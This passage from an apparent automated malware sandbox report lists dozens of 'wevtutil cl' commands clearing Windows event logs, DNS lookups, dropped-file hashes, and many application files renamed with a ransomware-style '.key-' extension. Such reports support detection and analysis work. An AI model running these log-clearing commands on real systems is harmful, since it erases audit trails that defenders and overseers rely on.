"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Control Panel Usage/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Control Panel/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Device Registration/Admin"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Device Registration/Debug"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Profile Service/Diagnostic"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl "Microsoft-Windows-User Profile Service/Operational"

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-User-Loader/Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-User-Loader/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserAccountControl/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserModePowerService/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/ActionCenter

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/DeviceInstall

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/DeviceMetadata/Debug

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/Performance

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UserPnp/SchedulerOperations

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UxInit/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-UxTheme/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VAN/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VDRVROOT/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VHDMP-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VHDMP-Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VIRTDISK-Analytic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VPN-Client/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VPN/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VWiFi/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VerifyHardwareSecurity/Admin

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VerifyHardwareSecurity/Operational

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-Volume/Diagnostic

C:\Windows\system32\wevtutil.exe

"C:\Windows\system32\wevtutil.exe" cl Microsoft-Windows-VolumeControl/Performance

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 100.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Public\Log.cmd

MD5 6a2f870841e0126632f5b9bf0d000d6a
SHA1 51689e26641f0eb054cd90553a21a472a2e79148
SHA256 4bcbb565ad2fd05a4fc458cd68254853cbcbf5749beffccb2b1e22b8a53ecb2f
SHA512 de089c5d2dd691c64e38bdc82a2a5266e65cf8f9fc40e2d60ecded7a775922ae5100cc406f09346fbaf402fc1fe3074ca29ecd64119f7c490381aee72780bdb0

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_02vup1cs.m20.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/464-11-0x00000281ABE50000-0x00000281ABE72000-memory.dmp

memory/4560-31-0x0000018E4BB40000-0x0000018E4BB50000-memory.dmp

memory/4560-15-0x0000018E4BA40000-0x0000018E4BA50000-memory.dmp

memory/4560-50-0x0000018E53D30000-0x0000018E53D31000-memory.dmp

memory/4560-52-0x0000018E53E70000-0x0000018E53E71000-memory.dmp

memory/4560-54-0x0000018E53E70000-0x0000018E53E71000-memory.dmp

memory/4560-55-0x0000018E53E80000-0x0000018E53E81000-memory.dmp

memory/4560-56-0x0000018E53E80000-0x0000018E53E81000-memory.dmp

memory/4560-58-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-57-0x0000018E53E80000-0x0000018E53E81000-memory.dmp

memory/4560-59-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-60-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-61-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-62-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-63-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-65-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-64-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-67-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-66-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-68-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-70-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-72-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-73-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-71-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-69-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-74-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-75-0x0000018E53EA0000-0x0000018E53EA1000-memory.dmp

memory/4560-76-0x0000018E53EB0000-0x0000018E53EB1000-memory.dmp

memory/4560-78-0x0000018E53FC0000-0x0000018E53FC1000-memory.dmp

memory/4560-77-0x0000018E53EB0000-0x0000018E53EB1000-memory.dmp

memory/4560-79-0x0000018E53F10000-0x0000018E53F11000-memory.dmp

memory/4560-80-0x0000018E53F10000-0x0000018E53F11000-memory.dmp

memory/1400-83-0x000002047A7E0000-0x000002047A8E0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\2K46EIP1\microsoft.windows[1].xml

MD5 d4094342c1ec7c5fa8fce43f5bd74289
SHA1 39c5e3b88e43dd663e336557aa83454a28f109c1
SHA256 1ab9a0971256ad36d900e4a1107ff12792d73df3058f10009991dcfdebc7894b
SHA512 def4f0b53d84b1785932abcbbd9dabaf950edaceeb89e367af6a2f9f589c2df02a064f2c371bb36ab409a5bad6fb05b5372394681a9a1ebffbd9a2b4cef77c6b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 7b955a6f1689da49f8b3c1b2448b4f6f
SHA1 1db14280a6d1023c916f860fcfe1c23ac5f504e7
SHA256 4f43f96785846d93a88fceb53d10959d9090dd6edd34c50d42971e21f81da9f7
SHA512 bf4ee701706aa982460e9cc2978d4e9803333ed3f1f776a1bfecbe2c36a204dbb28678fa3bf6b8c2a86b3e0cd3339037fdaa8ac0fc50c19f9f5dde75fa64a626

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133758890782403517.txt

MD5 acaef159923856ea5385473680463f1a
SHA1 8c961466b14c2070162ba4c62e1a6a7bc125adb6
SHA256 43c06c4ece982a6d6257b4edb81f99761aaa6da3900bb1b3960a76796044d7c8
SHA512 5a2ce71643926da5478125474593fb0a814025d4a09c29f96ca7735b4a7cc27d7e039d04831928ddb56b1bc820fbe36cf283c513a9c47e75050a2b1239ca3edf

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

MD5 c1098adee8c87ca90f4c906b7e6bc669
SHA1 f63a5456f52c4771cb0ea2aa5c1dfdfe9c712d57
SHA256 a0c2c4208dfa166b894caf9b2f82eb397d3917eb9dff1e269d95dbcb750dd84b
SHA512 a4b36aa3441fc1ce35078fc470f87e228b8b7e5806ff31619f07e45da43095cd79ef578faf57a99352a53525550170a10cec58b4f74abbfdc5e2ed0156238c5a

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{2F519BF2-C697-59F8-8F6A-1E19509CE66B}

MD5 8aaad0f4eb7d3c65f81c6e6b496ba889
SHA1 231237a501b9433c292991e4ec200b25c1589050
SHA256 813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1
SHA512 1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc

MD5 eab75a01498a0489b0c35e8b7d0036e5
SHA1 fd80fe2630e0443d1a1cef2bdb21257f3a162f86
SHA256 fdf01d2265452465fcbed01f1fdd994d8cbb41a40bbb1988166604c5450ead47
SHA512 2ec6c4f34dcf00b6588b536f15e3fe4d98a0b663c8d2a2df06aa7cface88e072e2c2b1b9aaf4dc5a17b29023a85297f1a007ff60b5d6d0c65d1546bf0e12dd45

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

MD5 77905bc2d6817bd87aa8c7d780e88091
SHA1 95a8e1ec3e239f1d47ab381d76969408c77a92c1
SHA256 993fa904b1fa428ff23df3f7bfee41025747acb95184f6fe0d67e92e59f9865e
SHA512 4214fb6cfb54cabccf6ed49cd3c05594835a90c9db752a791c5d698493bf5a718e694225e3e0a45e1bbe724a481cb9c4997c27a636adf6c3da3323f30bf13979

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ef3ef15b-7e43-4463-856b-4e550e1f40ec}\appssynonyms.txt

MD5 06a69ad411292eca66697dc17898e653
SHA1 fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d
SHA256 2aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1
SHA512 ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ef3ef15b-7e43-4463-856b-4e550e1f40ec}\appsglobals.txt

MD5 931b27b3ec2c5e9f29439fba87ec0dc9
SHA1 dd5e78f004c55bbebcd1d66786efc5ca4575c9b4
SHA256 541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e
SHA512 4ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ef3ef15b-7e43-4463-856b-4e550e1f40ec}\apps.schema

MD5 1659677c45c49a78f33551da43494005
SHA1 ae588ef3c9ea7839be032ab4323e04bc260d9387
SHA256 5af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb
SHA512 740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ef3ef15b-7e43-4463-856b-4e550e1f40ec}\appsconversions.txt

MD5 2bef0e21ceb249ffb5f123c1e5bd0292
SHA1 86877a464a0739114e45242b9d427e368ebcc02c
SHA256 8b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307
SHA512 f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91fae7da-18a1-43c8-aea8-6f40e8e2bc13}\0.0.filtertrie.intermediate.txt

MD5 f66204ddc2e55a4ba416e9768bd5aeaa
SHA1 0ebb17602b92ee42cfe273619c17c043402cc5dd
SHA256 232204c0488a893d3f9e8efdfbe01e2fc85561f8776449c804226717c394c631
SHA512 89df48f41251e2d0f4e6d0aa27a5edaa83b8d2316e9ef6249ac81c176f240106174620a1a70085e88dff6141319f2cff404f2f493d2240ad90e95bd812c9ede6

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91fae7da-18a1-43c8-aea8-6f40e8e2bc13}\0.1.filtertrie.intermediate.txt

MD5 34bd1dfb9f72cf4f86e6df6da0a9e49a
SHA1 5f96d66f33c81c0b10df2128d3860e3cb7e89563
SHA256 8e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c
SHA512 e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91fae7da-18a1-43c8-aea8-6f40e8e2bc13}\0.2.filtertrie.intermediate.txt

MD5 c204e9faaf8565ad333828beff2d786e
SHA1 7d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1
SHA256 d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f
SHA512 e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{ef3ef15b-7e43-4463-856b-4e550e1f40ec}\apps.csg

MD5 5475132f1c603298967f332dc9ffb864
SHA1 4749174f29f34c7d75979c25f31d79774a49ea46
SHA256 0b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd
SHA512 54433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91fae7da-18a1-43c8-aea8-6f40e8e2bc13}\Apps.index

MD5 b2cef728978026d476329fa104dd233f
SHA1 9b7bef0b534d8e617dea0720c6c924278f14e684
SHA256 60ae00e7bc8fbae18202e651929861d8860a4b6cb6ff7ae782e120468eb7be32
SHA512 33c0dc6afebd4a4a5af2480af84eb589d5776eaf12c2ba5ab4fd3a7d54e35df4cb6abfe06e6c5a370fecdaa9f45f57f6980f7f36088ceacff03a4db61d79013e

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91fae7da-18a1-43c8-aea8-6f40e8e2bc13}\Apps.ft

MD5 21de42414cc2933affe1828f1ed2a29d
SHA1 1e12e4c389cfc585798e6098eb1fc1dae7f06afa
SHA256 0f10432bb37db721342c227cab39b2309b007c8a1cb7eff2b9b76568e2c69c92
SHA512 1e2607e4fa237e88858e9733ad7adfb2d2fe0f861611f5a2d9e04b8cbee83c68b1ccc30d6a0740a5c64ed55fe62786c489dfc38d8396cfbde56c46b34bc6cec4

C:\Program Files\Java\jre-1.8\bin\plugin2\msvcp140.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 8a2f24238337814192af1f6f222ee2b8
SHA1 f77989f6b9ce7b33753dab6f20f2e94412ea2d65
SHA256 0f8e6be247da2a107f90f72d40187534d5cacaf7a6d87def82377dc9681969ea
SHA512 a95eec21afb27ffb5b5f29163e377b2f8f7a0e02044f19dad2e6f663e90b46c7cc86b4501d3392d947d38215cc249f051f30361f0295634b74a14fff2562203e

C:\Program Files\Java\jre-1.8\bin\vcruntime140.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 bb66788cf28ea103512fb4b5d5e9f58a
SHA1 7dc3372408736f1ecf4d459bfc5ff2893ecbb036
SHA256 dc7047cbfd3e106215f09a7f72ad5c9146084afbe9aa77448bdd7dec5b5028e9
SHA512 fe78b2052f83e3a4225f62d9d39afb54dcf332f357c076565a2dbd1d7a3f8bc052d7e0201fb03ee8ab171e490d6a4d18984f6024a094c3bc75c25a6b64e53053

C:\Program Files\Java\jre-1.8\bin\vcruntime140_1.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 f10e5963ec1f7ca97152b1708ede5a61
SHA1 a61f94a2b285337e8d8a8a9c138598d24956ec45
SHA256 cd849d862b6fae851f2d3e38657630aa194cc11fe72f00be4379d3c4243606b0
SHA512 46645ecfc4dc7eeabc485acac6d0fc776c59d3769c714283f566eb9be6a67dbb2c409cea5b65001b7a125331066697c485c6d30df553810e2d19923da876d9bd

C:\Program Files\Java\jre-1.8\lib\images\cursors\invalid32x32.gif.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 f5c4ae0449edcf9ad8d0c34db2bce1a2
SHA1 ed9d8fbe771aed233c5cc72241445e947e5a729f
SHA256 ee5e0753ad1e243c39a9f41ee0ee2e3cac98ac6c88f6af0322885efed7647561
SHA512 75719f869d085428bf7b8b7aa48de9f48d9bd27c8cd54c4aa69449e63789763835e0fb4028fb53c69e7e348e1de3ab75c407b5ecf46e588aa00cc73c739073de

C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_F_COL.HXK.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 d6e360efe4605f8b917db9a63f7bb3d5
SHA1 975a72a6b595447afe76d54d3f91642d76ae6965
SHA256 a489a015c62c3e38cc061aedaa8ea00926dcb9dc4fe90364137d32059ab219b3
SHA512 5c05e2632f4835c96a200458de93d451e23f44503d7890a74f16eb112da5a6e4cdff0b8c2e17f9b07f0f4d1dcc026cae1c79a10e5bd9a8057b1bc71c43efd7ac

C:\Program Files\Microsoft Office\root\Office16\1033\POWERPNT_K_COL.HXK.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 c6c933e2b547a1c42bc13245d2267abb
SHA1 476707fd451a4a3db4e3e588bba508eb35cdeac1
SHA256 885a33e8976b37641f478d0f4b61f118f8c49013bcd332c5fd7e45196e2603fc
SHA512 c51dec891b75501def0c4953b86aa8b76d82430e56cfcb0b281578cc8e4d6cb068f7f729ddbbae4efe08532afe15c318548503ef1a0a2b52f90e15c2a21cd1f7

C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-1000-0000000FF1CE}\misc.exe.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 4ed64eb7a9a4ee0dd3218a532128e63a
SHA1 5e4cef070f6f2f463f54a2f5a6afa65ade15ef95
SHA256 a363c89d46b85a62d9c3b2cea91cafcf24fc978c3da7ba6c47df1b15a8c9f0c8
SHA512 e45454bdb56418f7a727e673358f11c850e013938ab978430cb3f8097034c79201fae5a78ddbf6d32d0542e5af70bf39b117152847c841c326d343e33983ac8b

C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 8695bce8703f8e372799b4f145a19348
SHA1 b46f196a65ccf477347749f2bd7d67df23dd79b9
SHA256 daa457f01354ea108867b2b8232073f921080ac76fe33d2914b3a814a25c8d71
SHA512 cf501777bb3e71f069033120de940e7803062e94041a7ff5526ada23bad543b7c5d5f990d632796009a978c57c0922c326a05d02bca62500cb8b57f4b972852f

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 4dd495be28e1c2854b4edcf0df87fe4e
SHA1 c7bb88904dbda71cb310d2a84c7a7ecf743e2bd8
SHA256 9434abbca5697d7adf73720768446ee571f90609c8fbf2fb3c5abde47682ba53
SHA512 e5e9cd6d314999b9205d3188ecb08245ecfd955ff90e7f11c4b6ba6799c4ec2d99c453c3a91f80fab9255c50c6a8338f14bbd5a7500053f2f778f79d30a743db

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 25f7c9a769c5b13bda3ce67204f04eaf
SHA1 e84328a08a897d8609bd7bbcdc91c14dbf007539
SHA256 b543d287b3a4ff0d89b01bdecf3bc2ca6e34142bd0b6ca3008d246d78f8d2b3b
SHA512 798cf1b051e88003ba83e6765a69dc02f781edd34c1287651777e80e50b717ddc545105fad857186d8b0bebf07f81571ee710a1749bee8767732a35c000e346b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 46f3f315e3b4531fee62724e81c9d1a0
SHA1 d56298c8b6327be8f6052a6291e8d65cbf025633
SHA256 364d57fd363719b6713347b41e82ff9ac163ef4c234e93c23f8a224a6a91d243
SHA512 b860ff69719404f1a1b728396b59d405a31febae5d56fbbf3d68dc40eddb67950b8c0dec9fee9bcf9cfe686e2e9ea47bdbe6688d43173cce39ff624c4641ebf2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 db065acdbfc2cd041463b32c081a0e1e
SHA1 57a21225a915a08989166e8ddbf4d72bf81ab056
SHA256 4c784e972f2cd052196406ef605c215541165bdfaf69e35b7feb5364809f9619
SHA512 55c1e398c1395712ad8deaa91f687940c0207e457b9f34587634d996a3325e3ee765aaf7e2b0845a0e0d4d8aa6241be49a73bf98e95aa9c1b03ec07f8c42d286

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 e2be4094a94877be8c2a94c7cc145c03
SHA1 d25135cb1b9a57940b6308d2e96661205a23090a
SHA256 5393ad387b8b676af4a4fc80c32be94d2dd941f231313bdc837c68d69eabf3c3
SHA512 bbea15320a01fc65dd927a15bfacb9b1dd991c15ab864b4291a73eaa3d13df9e1fcdee2ace0e8a239eeb6814af2ce06cade095c4646d5489ac9b2df5c72391a1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 ab6a7551f660c977fdf4e8c92507ae93
SHA1 818da62e71b87641e912e33d6e012d7931aa903e
SHA256 da21edd65ea398431edc1a0a433cdf4be2f84a5bfd2d1d007d98f355d6c1486a
SHA512 772eeefa1e314ffc9fa4a9643853e7fb0c30475ba1802856a1085e0690d3f53389ceac05fc6e217a0fe0aa24075aaafaa5fbf6be07aa92fbda13c235ff0beb79

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 6188c40603d989c0b55a44204500eed9
SHA1 ab7f6d982fa63fb3ef43905a561a64f10d416e28
SHA256 058ab1c68afabce7939d82245ee2dbad42aa337a178495d4823d90ca7be99b9a
SHA512 bcedc40db7d95be24d1c1ef87b756b7960810dd7b0a0e0ef2dfa755f03e7f9b010ac5fd5b8840b4ac8b9dd8fd68e67bbd2e65a1f3fc2070b8d72ddce63c7d8a5

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 0acc50727a8b8a84ba16fc89371915c5
SHA1 d317f81a1837ce6d56dfdaa326896f22fda67886
SHA256 7bb5609fd14b729802c9b818865b6d27dc57b6d224b9c239060b4be3fe7ff732
SHA512 8880f88085ef0cb4f60f00e38d429605daa585e0d8f89e23c0b2bb0b96357858e8cc150512d7627ad568a6bcd7b43910e7e96482f4316005dd6c60dcee179b0c

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 850fcd19b5795e1a1d919e12a1fc109f
SHA1 1270c4a2be96453469008d4bfe0e4f1dc4fd04f8
SHA256 7f6ca98bce792683d3ee2dca9f2107da0c8f8253e4cec9923af27212b7c30d0c
SHA512 79642009582ebe7edfc7411a3dc99242903848320a51c037d4e138fc733677d25977487b8c65d5d2a4c543ffed0a689072816a021be22d103a3bad26bfeeb472

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 486d6b1f4372f5e1f171c922f26d5e4b
SHA1 996deb66670460b56eb9a5841dd6a080b625fcfa
SHA256 b5f586d28d733379d1f5a965fe99c3136784dbd1fef5e28b7af5b24997048378
SHA512 be3f8cf4bc8cb569e4fc307dc92db597111631b021be8034f01e04c24d582ba0facd20abcbbac4bd3f14ed9303d7424fc729312633d3f7423f7e509238573899

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 68c0a7b2efcc460bf29ac811acc6de36
SHA1 4e4875f2f32fbc8f384ad1bcfe68007cf9a1fe88
SHA256 605ae922d33eb262f5769a0001d22729858dc085b95e098c469697fcffb8dccb
SHA512 1892fd8c6b366f06401900d4c8fd9bf8b6edf53462894da61e1f5b80deaedd591e4b83a2ae1fccdc62f5852caab7d12dc71535fa9836b73c05f2fd534fd0487b

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 d2a9c49c795020d8f734b3e378456107
SHA1 08cc1548c517b2ae889e613e2f3b3a570ffd1114
SHA256 0ba3b42ad5fb6ca129faefa087b3a30265fa7766bedc08a87c6954ff0c3166c8
SHA512 516b216dc31c72ebf0297f0f244937ed414e05b54de78640f0a8a0be638de2adaa302d99bf37aa5bc9dd44e20e01eea269c10756523b3af4ec1b71c2fe46f0bb

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01

MD5 65f80bb467c7ad1cf8b145beb561ab95
SHA1 4eaa89dc056f1e9889f7c679a0f0563b75caddcf
SHA256 36c430adf5a8e6a931b1221fe4dd3e6f6b205017165dba879e3fbdea07091754
